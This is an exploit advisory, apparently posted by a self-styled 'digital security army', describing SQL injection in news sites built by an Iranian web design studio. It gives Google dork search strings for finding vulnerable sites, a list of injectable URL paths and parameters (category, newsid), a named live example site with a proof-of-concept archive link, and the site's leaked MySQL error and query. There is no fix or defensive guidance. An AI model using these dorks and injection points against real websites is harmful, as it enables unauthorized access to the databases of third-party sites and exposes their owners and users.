##############################################################################################################
# Exploit Title : Media-Art.ir HaaYahoo Web Design Studio Iran طراحی و اجرا: هنر رسانه SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : media-art.ir ~ haayahoo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
##############################################################################################################
# Google Dorks :
intext:''طراحی و اجرا: هنر رسانه''
intext:''مجری سایت: هنررسانه''
intext:''طراحی و توسعه هیاهـو''
# SQL Injection Exploits :
/newspaper/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/newspaper/index.php?year=%7Bdate-year%7D&month=%7Bdate-month%7D&day=%7Bdate-day%7D&category=[SQL Injection]
/news/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/PATH/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/newspaper/index.php?newsid=[SQL Injection]
/newspaper/engine/print.php?newsid=[SQL Injection]
/index.php?newsid=[SQL Injection]
##############################################################################################################
# Example Vulnerable Site =>
jahansanat.ir/newspaper/index.php?year=1396&month=01&day=28&category=[SQL] => [ Proof of Concept ] => archive.is/YXXPC
# SQL Database Error =>
MySQL error in file: /engine/modules/show.short.php at line 65
Error Number: 1064
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near 'AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date < '2018-09-30 ' at line 1
SQL query:
SELECT p.id, p.autor, p.date, p.short_story, CHAR_LENGTH(p.full_story) as full_story, p.xfields, p.title,
p.category, p.alt_name, p.comm_num, p.allow_comm, p.fixed, p.tags, e.news_read, e.allow_rate, e.rating, e.vote_num,
e.votes, e.view_edit, e.editdate, e.editor, e.reason FROM dle_post p LEFT JOIN dle_post_extras e ON (p.id=e.news_id)
WHERE date >= '2017-04-17' AND category= AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date
< '2018-09-30 03:13:55' ORDER BY date DESC LIMIT 0,1
##############################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################